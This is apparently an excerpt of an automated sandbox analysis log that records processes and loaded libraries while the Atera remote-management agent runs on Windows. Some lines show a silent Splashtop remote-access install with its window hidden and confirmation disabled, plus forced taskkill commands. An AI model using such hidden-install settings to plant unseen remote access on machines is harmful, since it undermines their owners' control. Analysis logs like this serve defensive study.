                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
